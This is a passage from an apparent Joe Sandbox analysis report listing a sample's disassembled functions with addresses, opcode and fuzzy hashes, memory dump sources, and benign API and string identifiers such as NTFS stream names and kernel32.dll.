                                                  • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                  • Instruction Fuzzy Hash: 2D823663A286C186DB14CF28E4652BC3BA1F795B89F19817ACA8EC7387DE3DD445C350
                                                  Function 00007FF6CA9C76C0 Relevance: .9, Instructions: 893COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                  • Instruction ID: 1a22b93838341ed3d45c24af63afc43ae6f390d0767e6201bc641d3a46161a28
                                                  • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                  • Instruction Fuzzy Hash: 82627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                  Function 00007FF6CA9E53F0 Relevance: .9, Instructions: 891COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                  • Instruction ID: 2ecf3d5343da0a72361ce1b1a0204dc7acc1d9311ad959249505dfb59441bd30
                                                  • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                  • Instruction Fuzzy Hash: 128210B2A186C08ADB14CF28E4656FC7BA1F755B49F088176CA8DC7787DE3C9885C750
                                                  Function 00007FF6CA9DBB90 Relevance: .6, Instructions: 587COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                  • Instruction ID: edf070f99c2c97a23499df4cc7cce6a4fcb603fb23b9d42f9780a40d4e862fb0
                                                  • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                  • Instruction Fuzzy Hash: 9D22F3B3B206508BD728CF25D89AA5E3766F799344B4B8228DF4ACB785DB38D505CB40
                                                  Function 00007FF6CA9E4B98 Relevance: .6, Instructions: 578COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                  • Instruction ID: cb516183cdfd35956c4a96d04a52d3161e66b9e479674ba6ab8074a619d2e633
                                                  • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                  • Instruction Fuzzy Hash: 8632D272A241918BE718CF24E5617BC37A1F794B49F058179DA8AC7B8ADF3CE854C780
                                                  Function 00007FF6CA9C7288 Relevance: .3, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                  • Instruction ID: 69fe0510e3e23855d481e4db98f75a42ddc8b2e6d98df0db1c61ca6c31c39fcf
                                                  • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                  • Instruction Fuzzy Hash: F9C18DB7B281908FE350CF7AE400A9D3BB1F39878CB519125EF59A7B09D639D645CB40
                                                  Function 00007FF6CA9E2D58 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                  • Instruction ID: 1ac4b282839c8ab4cd4ea89394ecbf2d977f14e273f1618a667c7b669a066542
                                                  • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                  • Instruction Fuzzy Hash: 5EA15673E2819242EB15CE28E4267BA6791FB90746F054574DACAC7787CE3CE881C781
                                                  Function 00007FF6CA9DAF18 Relevance: .2, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                  • Instruction ID: c1e8eb04817830b7e8ad5a4545345aae0fa6609ed4e660cf56e057606f7341c5
                                                  • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                  • Instruction Fuzzy Hash: 37C1F577A291E04DE302CBB5A4348FD3FB1E71E34DB4A4151EFE6A6B4AD6285201DB60
                                                  Function 00007FF6CA9CA310 Relevance: .2, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID:
                                                  • API String ID: 190572456-0
                                                  • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                  • Instruction ID: 4dc4b00961e691a48d969696be8350b0a52a029d2117a1e8af20ee38a2509ec6
                                                  • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                  • Instruction Fuzzy Hash: B0910562B2858596EB11DF29E8622FD6721FF95789F441031EF8EC7B4ADE38D646C300
                                                  Function 00007FF6CA9DB534 Relevance: .2, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                  • Instruction ID: 3737eef31322d0fc5582e848a6784978d53513049d8c6e90324f1ca0f9acc633
                                                  • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                  • Instruction Fuzzy Hash: D0610122F281D149EB01CF7595214FD7BB1A71A785B8680B2CFDAD7A47CE38E546CB10
                                                  Function 00007FF6CA9E21D0 Relevance: .1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                  • Instruction ID: 2b49cc1d8f6243369ab1b7ba694fcb83ef6155cfc4a502c781ba0220f14c507d
                                                  • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                  • Instruction Fuzzy Hash: B2510073A281518BEB288F28E4267AD3751FB84B49F444134DB89C778ACE3DE541CB40
                                                  Function 00007FF6CA9E2AB0 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                  • Instruction ID: 725610c7465d166d4654aaed699686b9d361ae240be8cc9ba751273b1863b3c9
                                                  • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                  • Instruction Fuzzy Hash: 3431EAB2A285814BEB18DE1AEA6227EB7D1F785345F048139DB86C7B43DE3CE441CB40
                                                  Function 00007FF6CA9DDC70 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                  • Instruction ID: 38a70901595faf8d3b98ad694312e1e29db67b8f9b10b37246576c86e942cad7
                                                  • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                  • Instruction Fuzzy Hash: E8F0DA61F3E00342FB680838682B33920569B11313F5588B5D19BC62E7DEADA8C29109
                                                  Function 00007FF6CA9F3354 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                  • Instruction ID: fb830510deecd100178f5b8a4ed2e6d8bc6229ab6c872c1887d45bf0b5a42b70
                                                  • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                  • Instruction Fuzzy Hash: 16A0016191CC82D0E6488F50B8750722220BB94302B9010B5F5AEC20A5AE7CA4028205
                                                  Function 00007FF6CA9CD7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                  • API String ID: 3668304517-727060406
                                                  • Opcode ID: b68ecd6b6244c16b65fc59ad38e25c14473093d62c915de36f9f2bb886cd508e
                                                  • Instruction ID: f3485ad70dfd80e3db212277ce427dd2c32132c4b298278b1216305c4f8890c9
                                                  • Opcode Fuzzy Hash: b68ecd6b6244c16b65fc59ad38e25c14473093d62c915de36f9f2bb886cd508e
                                                  • Instruction Fuzzy Hash: F5410936B16F4199EB059FA0E4653EC33B5EB08799F400176DA8D83769EF38D156C344
                                                  Function 00007FF6CA9F2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                  • Instruction ID: 1007994326be56b373ba602017b7a0246201ea912faa0cf0dfb636836db67ae3
                                                  • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                  • Instruction Fuzzy Hash: A8211060E19B4381FE599F91FD7927833A0AF58782F5401B9E98EC36A1DE3CE4578301
                                                  Function 00007FF6CA9D6A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                  • API String ID: 4097890229-4048004291
                                                  • Opcode ID: 5ee070c7a9a2d28e62e9f515ed83f853671db38dc2e7408bbfbfb4c76bf99ee7
                                                  • Instruction ID: 40114d51ce633ecb270ed1805fdc109f677e6977fcdfa8d903576ed4e80c8131
                                                  • Opcode Fuzzy Hash: 5ee070c7a9a2d28e62e9f515ed83f853671db38dc2e7408bbfbfb4c76bf99ee7
                                                  • Instruction Fuzzy Hash: 3712BD22F28A4284EB10DF68E4661ED6371EB81B89F504175EB9DC7AEADF3CD585C340
                                                  Function 00007FF6CA9E6E80 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
